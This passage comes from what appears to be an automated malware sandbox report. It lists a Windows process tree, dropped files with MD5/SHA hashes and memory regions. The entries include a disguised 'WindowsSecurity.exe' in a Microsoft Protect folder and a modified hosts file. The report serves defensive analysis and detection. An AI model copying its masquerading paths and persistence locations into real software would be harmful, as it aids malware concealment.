                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                1⤵
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:4316
                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                1⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:1832
                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:2144
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                  1⤵
                                                                                                                                    PID:2124
                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                    1⤵
                                                                                                                                      PID:3116
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                      1⤵
                                                                                                                                        PID:4740
                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                        PID:2128
                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 448 -p 4020 -ip 4020
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:4068

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        627073ee3ca9676911bee35548eff2b8

                                                                                                                                        SHA1

                                                                                                                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                        SHA256

                                                                                                                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                        SHA512

                                                                                                                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        944B

                                                                                                                                        MD5

                                                                                                                                        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                                                                                                                        SHA1

                                                                                                                                        9910190edfaccece1dfcc1d92e357772f5dae8f7

                                                                                                                                        SHA256

                                                                                                                                        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                                                                                                                        SHA512

                                                                                                                                        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        944B

                                                                                                                                        MD5

                                                                                                                                        d0a4a3b9a52b8fe3b019f6cd0ef3dad6

                                                                                                                                        SHA1

                                                                                                                                        fed70ce7834c3b97edbd078eccda1e5effa527cd

                                                                                                                                        SHA256

                                                                                                                                        21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

                                                                                                                                        SHA512

                                                                                                                                        1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        944B

                                                                                                                                        MD5

                                                                                                                                        190b28f40c0edd3cc08d0fd3aca4779a

                                                                                                                                        SHA1

                                                                                                                                        425b98532b6a18aa2baece47605f1cf6c8cfbd11

                                                                                                                                        SHA256

                                                                                                                                        8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce

                                                                                                                                        SHA512

                                                                                                                                        8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        dfd6ac138fd76606a84ed487483e01b7

                                                                                                                                        SHA1

                                                                                                                                        edc02d6e52547b99c415c3a3db83247adf131150

                                                                                                                                        SHA256

                                                                                                                                        5908797ff24f2dd5bf0249d64f0de1fb14a3e3ae8455af3ffd49e6c9145e5ca2

                                                                                                                                        SHA512

                                                                                                                                        16c95dcb012203f23229cf5add00767397f810146db0bca94feff46ea29809824cb2876daad902ceb2c4b8926eb910b2ddb3b559e756c9ee286bfa51a1a02f81

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.dll

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                        MD5

                                                                                                                                        3835a66eaf32f6976fe4cb6e8f48f6a3

                                                                                                                                        SHA1

                                                                                                                                        5b05654f79df69f46b55c0c3968288d844fbdf36

                                                                                                                                        SHA256

                                                                                                                                        66447fe0320c4401a83ed4648917a085493ca34d975b975f9db3ec6f7214e92b

                                                                                                                                        SHA512

                                                                                                                                        dbf7a5d00d660bc0a66a803d7494e3732e10478aab73d7cf496349bbc65de9a4c4655ea445d2cfee67c2c8c927d0ff03cd1a0582b99ad3b09e1232876be4b613

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RESB8FF.tmp

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        c099023a93c8641434585a6ff5f1c84d

                                                                                                                                        SHA1

                                                                                                                                        a0bb8a0da6fb2e85340cb7bb3e13927bab880164

                                                                                                                                        SHA256

                                                                                                                                        a223579d5c1aec53de66bdff0dc0d4ac6870ac619c6200ee0d43c18eb64a1443

                                                                                                                                        SHA512

                                                                                                                                        fce885ba0ee49a55d3ef22e3e85d72f357a4785b0b8ef31ecb1771564a06f329984b8f0851fecece778916ee0ca7d11cc7a77753431fa917fd540297c1e8e9f9

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SE0jQYTGq1\Display (1).png

                                                                                                                                        Filesize

                                                                                                                                        410KB

                                                                                                                                        MD5

                                                                                                                                        503e788ea81b0a330ed24ed6f6c03104

                                                                                                                                        SHA1

                                                                                                                                        c3df74a10e44eb99cc3c76abb9485c7b544a0215

                                                                                                                                        SHA256

                                                                                                                                        dd636edb4d7a884b6e0e040afd64eaf188b350c36276a62efacec8c2d8862478

                                                                                                                                        SHA512

                                                                                                                                        f1e91c045fe49519dd3bb42c6ce9f8b81a279a8fa497f284485c71df05e787627df1233212f4a6cbcbcc33ff6a490c75794389e038e7fa8589e191e82b31107b

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnqjsrcr.uzc.ps1

                                                                                                                                        Filesize

                                                                                                                                        60B

                                                                                                                                        MD5

                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                        SHA1

                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                        SHA256

                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                        SHA512

                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe

                                                                                                                                        Filesize

                                                                                                                                        14.4MB

                                                                                                                                        MD5

                                                                                                                                        0b36da64b85e5abae7a93017d46dcce1

                                                                                                                                        SHA1

                                                                                                                                        40506f88be2a8f9fc03083f8d934b58fe22c3ae5

                                                                                                                                        SHA256

                                                                                                                                        0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

                                                                                                                                        SHA512

                                                                                                                                        a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572

                                                                                                                                      • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        6e2386469072b80f18d5722d07afdc0b

                                                                                                                                        SHA1

                                                                                                                                        032d13e364833d7276fcab8a5b2759e79182880f

                                                                                                                                        SHA256

                                                                                                                                        ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                                                                                                        SHA512

                                                                                                                                        e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                        MD5

                                                                                                                                        dbbd2d4458d7e8094846420da595dfc3

                                                                                                                                        SHA1

                                                                                                                                        267cb47b904f14a519d2bd73abfdb30e1a06e1a6

                                                                                                                                        SHA256

                                                                                                                                        e27390d57580e3dfba07bec3d8e430203bbc91e90f6937079b3fd52abc721bd4

                                                                                                                                        SHA512

                                                                                                                                        480e7ca865b811f79f35fcfe7a9ac0280b48d1f9459873d18f000db55c72d53345cf3a10075c1ac407439545f699ce2a7bef38b00b4e19439edf384b00045531

                                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        f2dd68ab8e611f0143c6ad176f223ae9

                                                                                                                                        SHA1

                                                                                                                                        30f580175773f251a9572fe757de6eaef6844abc

                                                                                                                                        SHA256

                                                                                                                                        f935809085e90f8fc2c003afb46e81de28f3312ec097cf46f2bdc2488cb893e7

                                                                                                                                        SHA512

                                                                                                                                        f664b850c2fc6773e48171be5c180d8bc5c3a27945f5e6604605006a3c93e0bf3a516b647d6411a4d6b75bdf0a5e15b4f3621bf5702bbc3c46f9b517cb69dd04

                                                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.0.cs

                                                                                                                                        Filesize

                                                                                                                                        1004B

                                                                                                                                        MD5

                                                                                                                                        c76055a0388b713a1eabe16130684dc3

                                                                                                                                        SHA1

                                                                                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                                        SHA256

                                                                                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                                        SHA512

                                                                                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.cmdline

                                                                                                                                        Filesize

                                                                                                                                        607B

                                                                                                                                        MD5

                                                                                                                                        0cb6a0a46f890cb5e89c9942033e5be3

                                                                                                                                        SHA1

                                                                                                                                        b2add611d7f1ec8dc6977188665b3c356b30f9dd

                                                                                                                                        SHA256

                                                                                                                                        f1824d21334447b8be73f44b0469a78ff95c1fcff27948afead2f7cbd4cf86b4

                                                                                                                                        SHA512

                                                                                                                                        9f1735e9c9ddbd24b6281e1be7595494aadd1da114f4bd4f5651ad530b21053ef50a592668661c6b7312458e4133e98884bbdd5a88797c7df97c54730a5becc2

                                                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\0drkbexr\CSCC87C0D4F40DA4DC191D9F2D642A2B336.TMP

                                                                                                                                        Filesize

                                                                                                                                        652B

                                                                                                                                        MD5

                                                                                                                                        84b1ee77fac8e8f23bbfaff94ee2f0c6

                                                                                                                                        SHA1

                                                                                                                                        da6651a45ae76475c0fef29496f2f34bc6b22c75

                                                                                                                                        SHA256

                                                                                                                                        bbcf739c7502c331a477c510f307bd895420ceefcf562a24d716b174ff248fa9

                                                                                                                                        SHA512

                                                                                                                                        04655d89328730f4539e61903c9825d63f909a3ca734663833e411501b9cc9f609ac5d24dfc74bd40a6c456f22dfb9c93fdd5c849a1c541423f6455d182e0dff

                                                                                                                                      • memory/388-602-0x000001F3AD1F0000-0x000001F3AD2A3000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        716KB

                                                                                                                                      • memory/428-91-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/428-90-0x0000026ABBE20000-0x0000026ABBE47000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/500-98-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/500-97-0x00000200CE540000-0x00000200CE567000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/624-82-0x000002716E680000-0x000002716E6A7000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/624-80-0x000002716E650000-0x000002716E671000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        132KB

                                                                                                                                      • memory/624-83-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/688-86-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/688-85-0x0000026394570000-0x0000026394597000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/904-66-0x00007FF7AAE40000-0x00007FF7AE6F5000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        56.7MB

                                                                                                                                      • memory/908-141-0x000001B759490000-0x000001B7594B7000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/908-144-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/980-93-0x0000020A1E2C0000-0x0000020A1E2E7000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/980-94-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1044-147-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1044-146-0x000001ADAF360000-0x000001ADAF387000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1068-122-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1068-121-0x00000217C35D0000-0x00000217C35F7000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1180-124-0x000002209E6E0000-0x000002209E707000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1180-125-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1192-128-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1192-127-0x000002B843A60000-0x000002B843A87000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1248-130-0x000002AA4A750000-0x000002AA4A777000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1248-134-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1296-131-0x000001FEA98E0000-0x000001FEA9907000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1296-132-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1376-137-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1376-136-0x0000013EE3490000-0x0000013EE34B7000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1640-139-0x0000021535970000-0x0000021535997000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/1640-142-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/2148-79-0x00007FFB79100000-0x00007FFB791BD000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        756KB

                                                                                                                                      • memory/2148-78-0x00007FFB7AE80000-0x00007FFB7B089000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/2332-58-0x0000017CCBBB0000-0x0000017CCBBB8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/2596-16-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/2596-19-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/2596-0-0x00007FFB6B413000-0x00007FFB6B415000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/2596-5-0x000002A277540000-0x000002A277562000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/2596-14-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/2596-15-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3752-394-0x000001F9680F0000-0x000001F9680FA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/3752-393-0x000001F968110000-0x000001F96812C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        112KB

                                                                                                                                      • memory/3752-395-0x000001F968150000-0x000001F96816A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        104KB

                                                                                                                                      • memory/3752-396-0x000001F968100000-0x000001F968108000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3752-397-0x000001F968130000-0x000001F968136000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        24KB

                                                                                                                                      • memory/3752-398-0x000001F968140000-0x000001F96814A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/3752-392-0x000001F967F90000-0x000001F967F9A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/3752-391-0x000001F967DD0000-0x000001F967E83000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        716KB

                                                                                                                                      • memory/3752-390-0x000001F967DB0000-0x000001F967DCC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        112KB